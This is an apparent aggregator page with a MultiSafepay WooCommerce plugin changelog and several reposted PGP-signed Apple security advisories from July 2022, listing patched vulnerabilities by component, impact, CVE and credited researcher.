*   PLGWOOS-563: Remove some nonce validations to support custom checkouts forms (#249)
*   PLGWOOS-550: Typecast cart item quantity to int to avoid errors in the PHP-SDK (#248)

**Changed**

*   PLGWOOS-556: Change composer dependencies to avoid conflicts with other plugins (#247)
*   PLGWOOS-562: Add fallback for in3, in case no fields is filled in checkout, convert the transaction to redirect type (#250)

**Release Notes – WooCommerce 4.1.3 (Feb 21th, 2021)****Fixed**

*   PLGWOOS-549: Support custom order numbers generated by third party plugins in notification method
*   PLGWOOS-551: Resize logo if theme used by merchant do not support WooCommerce

**Release Notes – WooCommerce 4.1.2 (Feb 19th, 2021)****Fixed**

*   PLGWOOS-548: Fix iDEAL gateway if no issuer selected in checkout

**Release Notes – WooCommerce 4.1.1 (Feb 18th, 2021)****Changed**

*   PLGWOOS-545: Remove API Key validation

**Release Notes – WooCommerce 4.1.0 (Feb 17th, 2021)****Added**

*   PLGWOOS-512: Add support for tokenization.
*   PLGWOOS-521: Change order status on callback even if merchant did not save the settings, using defaults.
*   PLGWOOS-530: Process notification, even when the payment method returned by MultiSafepay is not registered as WooCommerce gateway.
*   PLGWOOS-531: Avoid process refund if amount submited in backend is 0

**Fixed**

*   PLGWOOS-535: Fix bug min\_amount filter
*   PLGWOOS-536: Fix instructions in multi select country field
*   PLGWOOS-518: Fix protocol of notification URL
*   PLGWOOS-526: Fix typo error in AfterPay payment method title
*   PLGWOOS-523: Fix type of transaction to redirect for Dotpay payment method

**Changed**

*   PLGWOOS-519: Improvement for coupons support in ShoppingCart.
*   PLGWOOS-528: Refactor gender and salutation fields to process different validation messages
*   PLGWOOS-503: Move debug mode field to options section

**Removed**

*   PLGWOOS-525: Remove validation in backend for MultiSafepay payment method
*   PLGWOOS-516: Avoid initialize the plugin if WooCommerce is not active

**Release Notes – WooCommerce 4.0.0 (internal release) (Feb 12th, 2021)****Added**

*   Complete rewrite of the plugin
*   Full and partial refunds for non billing suite payment methods
*   Full refunds for billing suite payment methods
*   Set MultiSafepay transactions as shipped when order reach the defined status in settings
*   Set MultiSafepay transaction as invoiced when order reach the defined status in settings
*   Filter payment methods by country
*   Filter payment methods by maximum amount of order
*   Filter payment methods by minimum amount of order
*   Custom initialized status for each payment method
*   Validations in backend settings fields
*   Support for compound taxes

**Changed**

*   PLGWOOS-410: Refactor plugin using the PHP-SDK

**Removed**

*   Remove FastCheckout

CVE-2022-33901: MultiSafepay plugin for WooCommerce

Apple Security Advisory Safari - Safari 15.6 addresses code execution and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

Safari 15.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213341.

Safari Extensions  
Available for: macOS Big Sur and macOS Catalina  
Impact: Visiting a maliciously crafted website may leak sensitive  
data  
Description: The issue was addressed with improved UI handling.  
CVE-2022-32784: Young Min Kim of CompSec Lab at Seoul National  
University

WebKit  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
WebKit Bugzilla: 240720  
CVE-2022-32792: Manfred Paul (@_manfp) working with Trend Micro Zero  
Day Initiative

WebRTC  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution.  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 242339  
CVE-2022-2294: Jan Vojtesek of Avast Threat Intelligence team

Safari 15.6 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmLYeuUACgkQeC9qKD1p  
rhh3QA//cN/O9LcDr67uACD/222GDWGZnm80emLeEmJaczyRYZNswciqGhAc7EPd  
qfyVvzq2DHAvFm64gGSGX6rzOzZbY9QRvkQ4TodqugeBoAIO0VM2moLTO/KR74fE  
SwWeWHTrPYD9k6/zCL7o3XdrwTcqvlbYD9AXSIJ1lI4BmmbDIjjLFjH5NfrsBixy  
vthQmj99twepLofgo1Wfjg1AfwUMrr6BVnZcpxEyBBjrjpBD5FVEZWJ+RB4nUaKP  
6aM4CPpXqPbou0w3bgMt0K8x2qpudolxOFfStu2FsSFVnw2B5khgcCL0C2qIO9Hb  
5n5NDb1FuPI7sDNcREIbBGjHqcjpQv5wkF7lz1EK6UQk3D4Rp8RJXFKYDWgwKNVA  
GcMEBXW8XmI3UrfpRJi/B8o/rMA9y75hVnPujl+KN9jX/6Ey7p09OK3hJavaFDuY  
heZyqdlfAa81Gwf+VBoF8bkYKZj2GCGOOL+zsuPLrtyEL8y28P5ZIBc5ALSzDgK5  
Fv4VnaE4adu8NIqU3DimQeD44G4IpZAhhS4BMiTVosZ+KUjtnX3hmFR+wI8bV2I1  
oBYtwRZOUyMHAfRSLtJFriqy5N5XK4NRD4Xb9q5auOOeyhWcgGY0K+9kSTNdDP6o  
hR93N6uOYQt7htOmiXF7ztUDMikh2i7A9NScLyX/k3y9uvtWMmw=  
=bU24  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-07-20-7

Apple Security Advisory 2022-07-20-6 - watchOS 8.7 addresses buffer overflow, bypass, code execution, out of bounds read, out of bounds write, and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-07-20-6 watchOS 8.7

watchOS 8.7 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213340.

APFS  
Available for: Apple Watch Series 3 and later  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32832: Tommy Muir (@Muirey03)

AppleAVD  
Available for: Apple Watch Series 3 and later  
Impact: A remote user may be able to cause kernel code execution  
Description: A buffer overflow issue was addressed with improved  
bounds checking.  
CVE-2022-32788: Natalie Silvanovich of Google Project Zero

AppleAVD  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32824: Antonio Zekic (@antoniozekic) and John Aakerblom  
(@jaakerblom)

AppleMobileFileIntegrity  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to gain root privileges  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 4  
and later  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with improved checks.  
CVE-2022-32845: Mohamed Ghannam (@_simo36)

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 4  
and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: This issue was addressed with improved checks.  
CVE-2022-32840: Mohamed Ghannam (@_simo36)

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 4  
and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32810: Mohamed Ghannam (@_simo36)

Audio  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-32820: an anonymous researcher

Audio  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32825: John Aakerblom (@jaakerblom)

CoreText  
Available for: Apple Watch Series 3 and later  
Impact: A remote user may cause an unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-32839: STAR Labs (@starlabs_sg)

File System Events  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to gain root privileges  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32819: Joshua Mason of Mandiant

GPU Drivers  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to disclose kernel memory  
Description: Multiple out-of-bounds write issues were addressed with  
improved bounds checking.  
CVE-2022-32793: an anonymous researcher

GPU Drivers  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-32821: John Aakerblom (@jaakerblom)

ICU  
Available for: Apple Watch Series 3 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

ImageIO  
Available for: Apple Watch Series 3 and later  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32841: hjy79425575

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32813: Xinru Chi of Pangu Lab  
CVE-2022-32815: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to disclose kernel memory  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-32817: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple Watch Series 3 and later  
Impact: An app with arbitrary kernel read and write capability may be  
able to bypass Pointer Authentication  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32844: Sreejith Krishnan R (@skr0x1c0)

Liblouis  
Available for: Apple Watch Series 3 and later  
Impact: An app may cause unexpected app termination or arbitrary code  
execution  
Description: This issue was addressed with improved checks.  
CVE-2022-26981: Hexhive (hexhive.epfl.ch), NCNIPC of China  
(nipc.org.cn)

libxml2  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to leak sensitive user information  
Description: A memory initialization issue was addressed with  
improved memory handling.  
CVE-2022-32823

Multi-Touch  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A type confusion issue was addressed with improved  
checks.  
CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

Multi-Touch  
Available for: Apple Watch Series 3 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A type confusion issue was addressed with improved state  
handling.  
CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)

Software Update  
Available for: Apple Watch Series 3 and later  
Impact: A user in a privileged network position can track a user’s  
activity  
Description: This issue was addressed by using HTTPS when sending  
information over the network.  
CVE-2022-32857: Jeffrey Paul (sneak.berlin)

WebKit  
Available for: Apple Watch Series 3 and later  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 239316  
CVE-2022-32816: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

WebKit  
Available for: Apple Watch Series 3 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
WebKit Bugzilla: 240720  
CVE-2022-32792: Manfred Paul (@_manfp) working with Trend Micro Zero  
Day Initiative

Wi-Fi  
Available for: Apple Watch Series 3 and later  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: This issue was addressed with improved checks.  
CVE-2022-32847: Wang Yu of Cyberserval

Additional recognition

AppleMobileFileIntegrity  
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive  
Security, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Reguła  
(@_r3ggi) of SecuRing for their assistance.

configd  
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive  
Security, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Reguła  
(@_r3ggi) of SecuRing for their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmLYeuUACgkQeC9qKD1p  
rhjSsg//XnukSPtKHk58IOSkcWaTk0WdrYv2+dGbdgkcPBgO2ehNQqk1xI3LDHLN  
b6A5MMaoR4ityTEC+i4XFWxVJNfzXFa1SHMiht1uJDtaNCc2F+VIP+EZJx2KYe7H  
O8F0g9lF33hQE3xDjrwtPe+7wYjfzgDX8iCbsfaNDPAWBq0BfNA8/4bv5GzPaPC4  
qcP+W9IRb11yAzlnCEgJNhMB0SLwtzpcUYLKcJbPdilABeYe08CLIIVAw2vKI1Kk  
J7sk/ZiGKnB1ZHa+fl17ahApKkLePnFtHR9rMseEpyRbPa7EvomZxUQoLvbaDf+Q  
gRqtysAw8oxfhetorvDFwAem3eCRdgJ/T/0U6jC+4dfHzVnGxV27K/PgF3GWRDU5  
trPVZ0cu8qdzgNAwSuRHTxTg923FN7cR14NL66TkGZ1d/VKfn1l0h1wctoPOhHPR  
zWJi5P8WbprG1XVWNx+aJYW09VIMsujJrrGQSn78o6gXOR2salEDiCs2JixKZnqK  
CV4+uGQIiE8bD0oA1B1uFQiPx3XtgOY92QQl8Jnn/7Xa6QQ0hq/3NmDN66RzO78S  
I4pH4Vt/L0LNoArGMCrO4URpLiQx5Au0niH5+jbvHyWr1Bm3Y+dMRP1yds3aLQ0Q  
16FIrWStzY+cnmOXQKczTIiaJYuSMjCOQicLuWx/q2ghfLCJ16E=  
=6Uj+  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-07-20-6

Apple Security Advisory 2022-07-20-5 - tvOS 15.6 addresses buffer overflow, bypass, code execution, information leakage, out of bounds read, out of bounds write, and spoofing vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-07-20-5 tvOS 15.6tvOS 15.6 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213342.APFSAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app with root privileges may be able to execute arbitrarycode with kernel privilegesDescription: The issue was addressed with improved memory handling.CVE-2022-32832: Tommy Muir (@Muirey03)AppleAVDAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: A remote user may be able to cause kernel code executionDescription: A buffer overflow issue was addressed with improvedbounds checking.CVE-2022-32788: Natalie Silvanovich of Google Project ZeroAppleAVDAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to disclose kernel memoryDescription: The issue was addressed with improved memory handling.CVE-2022-32824: Antonio Zekic (@antoniozekic) and John Aakerblom(@jaakerblom)AppleMobileFileIntegrityAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to gain root privilegesDescription: An authorization issue was addressed with improved statemanagement.CVE-2022-32826: Mickey Jin (@patch1t) of Trend MicroAudioAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: An out-of-bounds write issue was addressed with improvedinput validation.CVE-2022-32820: an anonymous researcherAudioAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to disclose kernel memoryDescription: The issue was addressed with improved memory handling.CVE-2022-32825: John Aakerblom (@jaakerblom)CoreMediaAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to disclose kernel memoryDescription: The issue was addressed with improved memory handling.CVE-2022-32828: Antonio Zekic (@antoniozekic) and John Aakerblom(@jaakerblom)CoreTextAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: A remote user may cause an unexpected app termination orarbitrary code executionDescription: The issue was addressed with improved bounds checks.CVE-2022-32839: STAR Labs (@starlabs_sg)File System EventsAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to gain root privilegesDescription: A logic issue was addressed with improved statemanagement.CVE-2022-32819: Joshua Mason of MandiantGPU DriversAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to disclose kernel memoryDescription: Multiple out-of-bounds write issues were addressed withimproved bounds checking.CVE-2022-32793: an anonymous researcherGPU DriversAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A memory corruption issue was addressed with improvedvalidation.CVE-2022-32821: John Aakerblom (@jaakerblom)iCloud Photo LibraryAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to access sensitive user informationDescription: An information disclosure issue was addressed byremoving the vulnerable code.CVE-2022-32849: Joshua JonesICUAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: An out-of-bounds write issue was addressed with improvedbounds checking.CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs& DNSLab, Korea Univ.ImageIOAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing a maliciously crafted image may result indisclosure of process memoryDescription: The issue was addressed with improved memory handling.CVE-2022-32841: hjy79425575ImageIOAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing a maliciously crafted file may lead to arbitrarycode executionDescription: A logic issue was addressed with improved checks.CVE-2022-32802: Ivan Fratric of Google Project Zero, Mickey Jin(@patch1t)ImageIOAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing a maliciously crafted image may lead to disclosureof user informationDescription: An out-of-bounds read issue was addressed with improvedbounds checking.CVE-2022-32830: Ye Zhang (@co0py_Cat) of Baidu SecurityKernelAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app with root privileges may be able to execute arbitrarycode with kernel privilegesDescription: The issue was addressed with improved memory handling.CVE-2022-32813: Xinru Chi of Pangu LabCVE-2022-32815: Xinru Chi of Pangu LabKernelAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to disclose kernel memoryDescription: An out-of-bounds read issue was addressed with improvedbounds checking.CVE-2022-32817: Xinru Chi of Pangu LabKernelAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app with arbitrary kernel read and write capability may beable to bypass Pointer AuthenticationDescription: A logic issue was addressed with improved statemanagement.CVE-2022-32844: Sreejith Krishnan R (@skr0x1c0)LiblouisAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may cause unexpected app termination or arbitrary codeexecutionDescription: This issue was addressed with improved checks.CVE-2022-26981: Hexhive (hexhive.epfl.ch), NCNIPC of China(nipc.org.cn)libxml2Available for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to leak sensitive user informationDescription: A memory initialization issue was addressed withimproved memory handling.CVE-2022-32823Multi-TouchAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to execute arbitrary code with kernelprivilegesDescription: A type confusion issue was addressed with improvedchecks.CVE-2022-32814: Pan ZhenPeng (@Peterpan0927)Software UpdateAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: A user in a privileged network position can track a user’sactivityDescription: This issue was addressed by using HTTPS when sendinginformation over the network.CVE-2022-32857: Jeffrey Paul (sneak.berlin)WebKitAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Visiting a website that frames malicious content may lead toUI spoofingDescription: The issue was addressed with improved UI handling.WebKit Bugzilla: 239316CVE-2022-32816: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs& DNSLab, Korea Univ.WebKitAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: Processing maliciously crafted web content may lead toarbitrary code executionDescription: An out-of-bounds write issue was addressed with improvedinput validation.WebKit Bugzilla: 240720CVE-2022-32792: Manfred Paul (@_manfp) working with Trend Micro ZeroDay InitiativeWi-FiAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: An app may be able to cause unexpected system termination orwrite kernel memoryDescription: This issue was addressed with improved checks.CVE-2022-32837: Wang Yu of CyberservalWi-FiAvailable for: Apple TV 4K, Apple TV 4K (2nd generation), and AppleTV HDImpact: A remote user may be able to cause unexpected systemtermination or corrupt kernel memoryDescription: This issue was addressed with improved checks.CVE-2022-32847: Wang Yu of CyberservalAdditional recognition802.1XWe would like to acknowledge Shin Sun of National Taiwan Universityfor their assistance.AppleMobileFileIntegrityWe would like to acknowledge Csaba Fitzl (@theevilbit) of OffensiveSecurity, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Reguła(@_r3ggi) of SecuRing for their assistance.configdWe would like to acknowledge Csaba Fitzl (@theevilbit) of OffensiveSecurity, Mickey Jin (@patch1t) of Trend Micro, and Wojciech Reguła(@_r3ggi) of SecuRing for their assistance.Apple TV will periodically check for software updates. Alternatively,you may manually check for software updates by selecting "Settings ->System -> Software Update -> Update Software."  To check the currentversion of software, select "Settings -> General -> About."All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmLYeuUACgkQeC9qKD1prhgqhA//RvdwRWv4x9V+fyJIcdfoFcXnJ/E5rxv6BQjpWnVcFRa/QKVU5lu7AbMkg6R+txpMiG1JAMqAB4oySZMtlxg0RVjCK3vBRy6v61uhBM5IgupHVZeXRVdYNGlJyitKP7fFbYBuZ9+wcXNE8zeKpF+dUsz0T6CNh4bo6kStyBH5RqpWdPmX5XBtwwf7/czmfRLrhqcWdhkXJ99yN+836TFtqnUDddJRCx0DRXLYuZCXTe2QwqY6F7d+JrCOP5XN3WntDeYZ6Yn7OK4a1KWdQ9DaKfbpVU/3iC5gFbwLkejzt7rk7QohxetWPooKkD6VMT+lnAS6jDqlLqnb+JLZKM353VQEW5lvLs2/UO0IqP/dSAJwHopikooKPcs+KegPiZ8O9OEiYBuVAXZiGgQYFhx3eFu+BWoSSsX3JVSsYPQE1ehF8wy5PbjpK9ru7/s9ZpOpl0rTiBUxMc/yTZbJ2BBZf9lMCykhciQ5wZC5tmfELFnhszQEiBM9mN3Kea5jRTobOq8gU/nb4AZbnVFMJ+gX60w8ZlvGI+E+bnEZq+tBlXFHMZ63avjsYarQD+2Gs4FtmeAEc7/vJ8RY3RI4mqu+9rMaxniPjsLCY8Kl5OvSYJrbs4YL+dqxe7Mp20mn2COHtyFEEOoh+NVY1XuzSoDX4TeDBxpuqH5l9MV4TMFUh4M==i68Z-----END PGP SIGNATURE-----

Apple Security Advisory 2022-07-20-5

Apple Security Advisory 2022-07-20-4 - Security Update 2022-005 Catalina addresses code execution, information leakage, null pointer, out of bounds read, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-07-20-4 Security Update 2022-005 Catalina

Security Update 2022-005 Catalina addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213343.

APFS  
Available for: macOS Catalina  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32832: Tommy Muir (@Muirey03)

AppleMobileFileIntegrity  
Available for: macOS Catalina  
Impact: An app may be able to gain root privileges  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro

AppleScript  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected termination or disclosure of process memory  
Description: This issue was addressed with improved checks.  
CVE-2022-32797: Mickey Jin (@patch1t), Ye Zhang (@co0py_Cat) of Baidu  
Security, Mickey Jin (@patch1t) of Trend Micro

AppleScript  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected termination or disclosure of process memory  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-32853: Ye Zhang(@co0py_Cat) of Baidu Security  
CVE-2022-32851: Ye Zhang (@co0py_Cat) of Baidu Security

AppleScript  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected termination or disclosure of process memory  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2022-32831: Ye Zhang (@co0py_Cat) of Baidu Security

Audio  
Available for: macOS Catalina  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-32820: an anonymous researcher

Calendar  
Available for: macOS Catalina  
Impact: An app may be able to access sensitive user information  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2022-32805: Csaba Fitzl (@theevilbit) of Offensive Security

Calendar  
Available for: macOS Catalina  
Impact: An app may be able to access user-sensitive data  
Description: An information disclosure issue was addressed by  
removing the vulnerable code.  
CVE-2022-32849: Joshua Jones

CoreText  
Available for: macOS Catalina  
Impact: A remote user may cause an unexpected app termination or  
arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-32839: STAR Labs (@starlabs_sg)

FaceTime  
Available for: macOS Catalina  
Impact: An app with root privileges may be able to access private  
information  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2022-32781: Wojciech Reguła (@_r3ggi) of SecuRing

File System Events  
Available for: macOS Catalina  
Impact: An app may be able to gain root privileges  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32819: Joshua Mason of Mandiant

ICU  
Available for: macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

ImageIO  
Available for: macOS Catalina  
Impact: Processing an image may lead to a denial-of-service  
Description: A null pointer dereference was addressed with improved  
validation.  
CVE-2022-32785: Yiğit Can YILMAZ (@yilmazcanyigit)

Intel Graphics Driver  
Available for: macOS Catalina  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32812: Yinyi Wu (@3ndy1), ABC Research s.r.o.

Intel Graphics Driver  
Available for: macOS Catalina  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2022-32811: ABC Research s.r.o

Kernel  
Available for: macOS Catalina  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32815: Xinru Chi of Pangu Lab  
CVE-2022-32813: Xinru Chi of Pangu Lab

libxml2  
Available for: macOS Catalina  
Impact: An app may be able to leak sensitive user information  
Description: A memory initialization issue was addressed with  
improved memory handling.  
CVE-2022-32823

PackageKit  
Available for: macOS Catalina  
Impact: An app may be able to modify protected parts of the file  
system  
Description: An issue in the handling of environment variables was  
addressed with improved validation.  
CVE-2022-32786: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Catalina  
Impact: An app may be able to modify protected parts of the file  
system  
Description: This issue was addressed with improved checks.  
CVE-2022-32800: Mickey Jin (@patch1t)

PluginKit  
Available for: macOS Catalina  
Impact: An app may be able to read arbitrary files  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-32838: Mickey Jin (@patch1t) of Trend Micro

PS Normalizer  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted Postscript file may result  
in unexpected app termination or disclosure of process memory  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-32843: Kai Lu of Zscaler's ThreatLabz

SMB  
Available for: macOS Catalina  
Impact: An app may be able to gain elevated privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-32842: Sreejith Krishnan R (@skr0x1c0)

SMB  
Available for: macOS Catalina  
Impact: A user in a privileged network position may be able to leak  
sensitive information  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-32799: Sreejith Krishnan R (@skr0x1c0)

Software Update  
Available for: macOS Catalina  
Impact: A user in a privileged network position can track a user’s  
activity  
Description: This issue was addressed by using HTTPS when sending  
information over the network.  
CVE-2022-32857: Jeffrey Paul (sneak.berlin)

Spindump  
Available for: macOS Catalina  
Impact: An app may be able to overwrite arbitrary files  
Description: This issue was addressed with improved file handling.  
CVE-2022-32807: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab

Spotlight  
Available for: macOS Catalina  
Impact: An app may be able to gain elevated privileges  
Description: A validation issue in the handling of symlinks was  
addressed with improved validation of symlinks.  
CVE-2022-26704: Joshua Mason of Mandiant

TCC  
Available for: macOS Catalina  
Impact: An app may be able to access sensitive user information  
Description: An access issue was addressed with improvements to the  
sandbox.  
CVE-2022-32834: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020)  
of Tencent Security Xuanwu Lab (xlab.tencent.com)

Vim  
Available for: macOS Catalina  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating Vim.  
CVE-2021-4136  
CVE-2021-4166  
CVE-2021-4173  
CVE-2021-4187  
CVE-2021-4192  
CVE-2021-4193  
CVE-2021-46059  
CVE-2022-0128

Wi-Fi  
Available for: macOS Catalina  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: This issue was addressed with improved checks.  
